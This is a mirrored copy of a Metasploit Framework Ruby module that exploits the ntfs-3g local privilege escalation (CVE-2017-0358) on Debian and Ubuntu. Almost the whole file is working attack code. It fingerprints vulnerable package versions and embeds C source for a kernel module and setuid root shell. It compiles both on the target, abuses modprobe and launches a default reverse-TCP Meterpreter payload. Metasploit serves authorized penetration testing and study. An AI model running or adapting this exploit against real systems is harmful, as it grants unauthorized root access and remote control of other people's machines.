CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/ntfs3g_priv_esc.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Post::File

11
  include Msf::Exploit::FileDropper

12


13
  def initialize(info={})

14
    super( update_info( info, {

15
        'Name'          => 'Debian/Ubuntu ntfs-3g Local Privilege Escalation',

16
        'Description'   => %q{

17
          ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe.

18
          This can be abused to load a kernel module and execute a binary payload as the root user.

19
        },

20
        'License'       => MSF_LICENSE,

21
        'Author'        =>

22
          [

23
            '[email protected]',                    # discovery

24
            'h00die <[email protected]>' # metasploit module

25
          ],

26
        'Platform'      => [ 'linux' ],

27
        'Arch'          => [ ARCH_X86, ARCH_X64 ],

28
        'SessionTypes'  => [ 'shell', 'meterpreter' ],

29
        'References'    =>

30
          [

31
            [ 'CVE', '2017-0358' ],

32
            [ 'EDB', '41356' ],

33
            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1072' ]

34
          ],

35
        'Targets'       =>

36
          [

37
            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],

38
            [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]

39
          ],

40
        'DefaultOptions' =>

41
          {

42
            'payload' => 'linux/x64/meterpreter/reverse_tcp',

43
            'PrependFork' => true,

44
            },

45
        'DefaultTarget' => 1,

46
        'DisclosureDate' => '2017-01-05',

47
        'Privileged'     => true

48
      }

49
      ))

50
    register_advanced_options [

51
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

52
    ]

53
  end

54


55
  def check

56


57
    # check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.

58
    def headers_installed?()

59
      output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')

60
      if output

61
        if output.include?('linux-headers')

62
          return true

63
        else

64
          print_error('Linux kernel headers not available, compiling will fail.')

65
          return false

66
        end

67
      end

68
      false

69
    end

70


71
    output = cmd_exec('dpkg -l ntfs-3g | grep \'^ii\'')

72
    if output

73
      if output.include?('1:2015.3.14AR.1-1build1') #Ubuntu 16.04 LTS

74
        print_good('Vulnerable Ubuntu 16.04 detected')

75
        CheckCode::Appears

76
      elsif output.include?('1:2016.2.22AR.1-3') #Ubuntu 16.10

77
        print_good('Vulnerable Ubuntu 16.10 detected')

78
        CheckCode::Appears

79
      elsif output.include?('1:2012.1.15AR.5-2.1+deb7u2') #Debian Wheezy, we also need linux-source installed

80
        print_good('Vulnerable Debian 7 (wheezy) detected')

81
        if headers_installed?()

82
          CheckCode::Appears

83
        else

84
          CheckCode::Safe

85
        end

86
        CheckCode::Appears

87
      elsif output.include?('1:2014.2.15AR.2-1+deb8u2') #Debian Jessie, we also need linux-source installed

88
        print_good('Vulnerable Debian 8 (jessie) detected')

89
        if headers_installed?()

90
          CheckCode::Appears

91
        else

92
          CheckCode::Safe

93
        end

94
        CheckCode::Appears

95
      else

96
        print_error("Version installed not vulnerable: #{output}")

97
        CheckCode::Safe

98
      end

99
    else

100
      print_error('ntfs-3g not installed')

101
      CheckCode::Safe

102
    end

103
  end

104


105
  def exploit

106
    def upload_and_compile(filename, file_path, file_content, compile=nil)

107
      rm_f "#{file_path}"

108
      if not compile.nil?

109
        rm_f "#{file_path}.c"

110
        vprint_status("Writing #{filename} to #{file_path}.c")

111
        write_file("#{file_path}.c", file_content)

112
        register_file_for_cleanup("#{file_path}.c")

113
        output = cmd_exec(compile)

114
        if output != ''

115
          print_error(output)

116
          fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile")

117
        end

118
      else

119
        vprint_status("Writing #{filename} to #{file_path}")

120
        write_file(file_path, file_content)

121
      end

122
      cmd_exec("chmod +x #{file_path}");

123
      register_file_for_cleanup(file_path)

124
    end

125


126
    # These are direct copies of the modules from EDB

127
    rootmod = %q{

128
      #include <linux/module.h>

129
      #include <linux/kernel.h>

130
      #include <linux/cred.h>

131
      #include <linux/syscalls.h>

132
      #include <linux/kallsyms.h>

133


134
      static int suidfile_fd = -1;

135
      module_param(suidfile_fd, int, 0);

136


137
      static int __init init_rootmod(void) {

138
        int (*sys_fchown_)(int fd, int uid, int gid);

139
        int (*sys_fchmod_)(int fd, int mode);

140
        const struct cred *kcred, *oldcred;

141


142
        sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");

143
        sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");

144


145
        printk(KERN_INFO "rootmod loading\n");

146
        kcred = prepare_kernel_cred(NULL);

147
        oldcred = override_creds(kcred);

148
        sys_fchown_(suidfile_fd, 0, 0);

149
        sys_fchmod_(suidfile_fd, 06755);

150
        revert_creds(oldcred);

151
        return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */

152
      }

153


154
      static void __exit cleanup_rootmod(void) {}

155


156
      module_init(init_rootmod);

157
      module_exit(cleanup_rootmod);

158


159
      MODULE_LICENSE("GPL v2");

160
    }

161


162
    rootshell = %q{

163
      #include <unistd.h>

164
      #include <err.h>

165
      #include <stdio.h>

166
      #include <sys/types.h>

167


168
      int main(void) {

169
        if (setuid(0) || setgid(0))

170
          err(1, "setuid/setgid");

171
        fputs("we have root privs now...\n", stderr);

172
        execl("/bin/bash", "bash", NULL);

173
        err(1, "execl");

174
      }

175
    }

176


177
    # we moved sploit.c off since it was so big to the external sources folder

178
    path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2017-0358', 'sploit.c')

179
    fd = ::File.open( path, "rb")

180
    sploit = fd.read(fd.stat.size)

181
    fd.close

182


183
    rootmod_filename = 'rootmod'

184
    rootmod_path = "#{datastore['WritableDir']}/#{rootmod_filename}"

185
    rootshell_filename = 'rootshell'

186
    rootshell_path = "#{datastore['WritableDir']}/#{rootshell_filename}"

187
    sploit_filename = 'sploit'

188
    sploit_path = "#{datastore['WritableDir']}/#{sploit_filename}"

189
    payload_filename = rand_text_alpha(8)

190
    payload_path = "#{datastore['WritableDir']}/#{payload_filename}"

191


192
    if check != CheckCode::Appears

193
      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')

194
    end

195


196
    def has_prereqs?()

197
      def check_gcc?()

198
        gcc = cmd_exec('which gcc')

199
        if gcc.include?('gcc')

200
          vprint_good('gcc is installed')

201
          return true

202
        else

203
          print_error('gcc is not installed.  Compiling will fail.')

204
          return false

205
        end

206
      end

207


208
      def check_make?()

209
        make = cmd_exec('which make')

210
        if make.include?('make')

211
          vprint_good('make is installed')

212
          return true

213
        else

214
          print_error('make is not installed.  Compiling will fail.')

215
          return false

216
        end

217
      end

218


219
      return check_make?() && check_gcc?()

220
    end

221


222
    if has_prereqs?()

223
      vprint_status('Live compiling exploit on system')

224
    else

225
      fail_with(Failure::Unknown, 'make and gcc required on system to build exploit for kernel')

226
    end

227


228
    # make our substitutions so things are dynamic

229
    rootshell.gsub!(/execl\("\/bin\/bash", "bash", NULL\);/,

230
               "return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable

231
    print_status('Writing files to target')

232
    cmd_exec("cd #{datastore['WritableDir']}")

233


234
    #write all the files and compile.  This is equivalent to the original compile.sh

235
    #gcc -o rootshell rootshell.c -Wall

236
    upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")

237
    #gcc -o sploit sploit.c -Wall -std=gnu99

238
    upload_and_compile('sploit', sploit_path, sploit, "gcc -o #{sploit_filename} #{sploit_filename}.c -Wall -std=gnu99")

239
    #make -C /lib/modules/$(uname -r)/build M=$(pwd) modules

240
    upload_and_compile('rootmod', "#{rootmod_path}.c", rootmod, nil)

241
    upload_and_compile('Makefile', "#{datastore['WritableDir']}/Makefile", 'obj-m := rootmod.o', nil)

242
    cmd_exec('make -C /lib/modules/$(uname -r)/build M=$(pwd) modules')

243
    upload_and_compile('payload', payload_path, generate_payload_exe)

244


245
    #This is equivalent to the 2nd half of the compile.sh file

246
    cmd_exec('mkdir -p depmod_tmp/lib/modules/$(uname -r)')

247
    cmd_exec('cp rootmod.ko depmod_tmp/lib/modules/$(uname -r)/')

248
    cmd_exec('/sbin/depmod -b depmod_tmp/')

249
    cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')

250
    cmd_exec('rm -rf depmod_tmp')

251


252
    register_file_for_cleanup("#{rootmod_path}.ko")

253
    register_file_for_cleanup("#{rootmod_path}.mod.c")

254
    register_file_for_cleanup("#{rootmod_path}.mod.o")

255
    register_file_for_cleanup("#{rootmod_path}.o")

256


257
    # and here we go!

258
    print_status('Starting execution of priv esc.')

259
    output = cmd_exec(sploit_path)

260
    unless session_created?

261
      # this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,

262
      # but binary payload was caught, or NIPS shut down the callback etc.

263
      vprint_error(output)

264
    end

265
  end

266


267
  def on_new_session(session)

268
    # if we don't /bin/bash here, our payload times out

269
    # [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:37022) at 2016-09-27 14:15:04 -0400

270
    # [*] 192.168.199.130 - Meterpreter session 2 closed.  Reason: Died

271
    session.shell_command_token('/bin/bash')

272
    super

273
  end

274
end

275


276